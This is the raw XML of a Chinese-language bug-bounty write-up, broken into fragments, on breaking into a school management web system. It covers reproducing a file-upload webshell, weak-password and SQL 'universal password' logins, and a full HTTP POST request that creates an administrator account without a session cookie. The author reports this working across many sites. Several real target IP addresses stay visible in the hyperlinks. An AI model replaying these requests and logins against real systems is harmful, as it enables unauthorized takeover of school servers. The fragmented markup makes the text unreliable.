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查找目标</w:t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从已知文库寻找目标：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目前常见文库： peiqi文库（不需要邀请码），零组文库和白泽文库（需要邀请码）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此次选择peiqi文库：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"http://wiki.peiqi.tech/"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http://wiki.peiqi.tech/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由于我之前是挖edusrc,所以我在打击目标的时候，都是找关于学校的web系统于是开始寻找目标：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找web应用，然后查看关于学校应用的系统漏洞，并获取fofa关键词，自己再去进行漏洞挖掘（ 一般出现过的漏洞系统，肯定不止一个存在漏洞，每个人的思路不一样，所挖掘到的漏洞就不一样）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330450"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="1" name="图片 1" descr="JUXM82BP7GG9~6AU`R843]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UXM82BP7GG9~6AU`R843]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对fofa关键词查看，自己通过已知漏洞去获取对自己有用的资源（比如任意漏洞下载我们就可以通过这个获取web系统的源码，下一步进行白盒审计，或者能前台getshell 的，我们就可以通过命令执行或者写马去获取资源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="2214" w:firstLineChars="900"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="444444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44444"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>body="DC_Login/QYSignUp"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034915" cy="2193290"/>
            <wp:effectExtent l="0" t="0" r="13335" b="16510"/>
            <wp:docPr id="2" name="图片 2" descr="%`F74F1GK31J19M37]8)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`F74F1GK31J19M37]8)G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历史漏洞复现（找到能还原复现的站点，如果全部修复，就自己新挖掘该系统）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 xml:space="preserve"> 由于漏洞详细可以知道，在前台企业注册点可以得知，存在文件上传点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="1728" w:firstLineChars="800"/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instrText xml:space="preserve"> HYPERLINK "http://1.71.191.151:3306/DC_Login/QYSignUp"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http://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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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.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xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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.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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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.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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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:3306/DC_Login/QYSignUp</w:t>
      </w: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然后开始文件上传获取webshell（通过插件（wappalyzer）得知是asp马子）：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6690" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="10160" b="12065"/>
            <wp:docPr id="3" name="图片 3" descr="`2II0YWZ_FCYFW(5BWY]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2II0YWZ_FCYFW(5BWY]A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44444"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此漏洞已被修复（后面的就用peiqi的图片表示）：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830" cy="4199890"/>
            <wp:effectExtent l="0" t="0" r="13970" b="101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当你通过此漏洞获取到webshell时候，你就可以打包源码，进行代码审计，如果审计成功，通杀就获取了，轻松愉快 上分。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当然，如果你不会代码审计，那就只有玩黑盒：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1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通过文库获取到脆弱系统，一般看见登录框常见两个操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="24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弱口令 admin/admin  admin/123456  或者收集一个小字典（常见管理员账号和密码大约1w就行）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="24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万能密码  根据语言来选择  比如asp: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 1 = 1 --   具体绕过的自己分析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这是常见的两种方法：（弱口令yyds）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案例：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"http://60.174.97.186:8001/DC_Login/Index"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http://xxx.xx.xxx.xxx:8001/DC_Login/Index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admin\admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="630" w:firstLineChars="3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"http://111.56.44.108:8989/DC_Login/Index"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21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://</w:t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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:8989/DC_Login/Index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admin\admin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当时测出大约有15个系统系统存在，然后提交edu吃了点烂rank。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24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当进入系统后台后重点关注的功能点：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用户管理功能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（这个功能点几乎所有后台都会有的，测试方法是添加管理员的时候删除cookie，如果成功，则可能通杀该系统所有站点）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="24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1135" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="5715" b="635"/>
            <wp:docPr id="5" name="图片 5" descr="]9OJI{9J7H6$XOAU@NYAL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9OJI{9J7H6$XOAU@NYAL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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="240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http://xxx.xxx.xx.xx:8989/能弱口令进入的系统： admin\admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="555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添加管理员处抓包，然后发送包添加成功：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="55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9230" cy="2699385"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="6" name="图片 6" descr="`IVM94LJXBZ_A87D@VP)9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IVM94LJXBZ_A87D@VP)9R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5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555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删除cookie后尝试能否添加成功，发现也可以添加成功：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801110" cy="1443990"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="7" name="图片 7" descr="YX{FK[OFHKS_PBJ@O{75O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YX{FK[OFHKS_PBJ@O{75OXJ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5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返回查看：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2405" cy="1467485"/>
            <wp:effectExtent l="0" t="0" r="4445" b="18415"/>
            <wp:docPr id="8" name="图片 8" descr="`{M~73_D34JMVIPY]G6G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`{M~73_D34JMVIPY]G6GV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退出使用删除cookie后添加的账户，看看能否正常登录：（成功登录）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="55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4310" cy="4533900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="$_KN9]T@}IRBG{%YC{@[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$_KN9]T@}IRBG{%YC{@[RS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5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发现删除cookie后都可以，这样将不可以登录的站点，看看使用此数据包，是否可以成功登录：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="55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案例站点：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"http://220.180.112.209:8001/#"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http://xxx.xxx.xx.xx:8001/#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将数据包中的host换为目标站点的ip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POST /DC_BASE_QXGL_User/SaveData HTTP/1.1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 xml:space="preserve">Host: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xxx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xx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xx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xx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:8989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Content-Length: 151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Accept: */*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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36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Content-Type: application/x-www-form-urlencoded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Origin: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Referer: /DC_BASE_QXGL_User/UserEdit?eid=add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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Connection: close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eid=add&amp;fmDataStr={"uid":"-1","utype":"0","ghxh":"200","uname":"test2","psw":"admin123","psw2":"admin123","roleid":"2","rolename":"ç®¡çå"}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55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将目标站点的ip写在数据包中的host，然后burp修改目标，进行放包：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9230" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="10" name="图片 10" descr="$R_E7J{NJ~8HNLR0{6A%@{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$R_E7J{NJ~8HNLR0{6A%@{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55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可以看见处理，在尝试登录：</w:t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8595" cy="2420620"/>
            <wp:effectExtent l="0" t="0" r="8255" b="17780"/>
            <wp:docPr id="11" name="图片 11" descr="K8_]NOXQKIJV2JDD@KB{4{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8_]NOXQKIJV2JDD@KB{4{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55"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Ok   通杀到手，补天通用给了100元，然后edu刷了30rank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27D0AB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CB27D0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55" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="2D40E886"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2D40E88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4C9731ED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C9731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D5604A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4ED560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0DE1F2B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="50DE1F2B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="120" w:leftChars="0" w:firstLine="0" w:firstLineChars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129C0"/>
    <w:rsid w:val="0B673A3C"/>
    <w:rsid w:val="2962297F"/>
    <w:rsid w:val="5991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2021-07-19T01:42:00Z</dcterms:created>
  <dc:creator>啊！</dc:creator>
  <cp:lastModifiedBy>啊！</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-03T07:06:32Z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C6552F24D4614EAAA24074050283165E</vt:lpwstr>
  </property>
</Properties>
</file>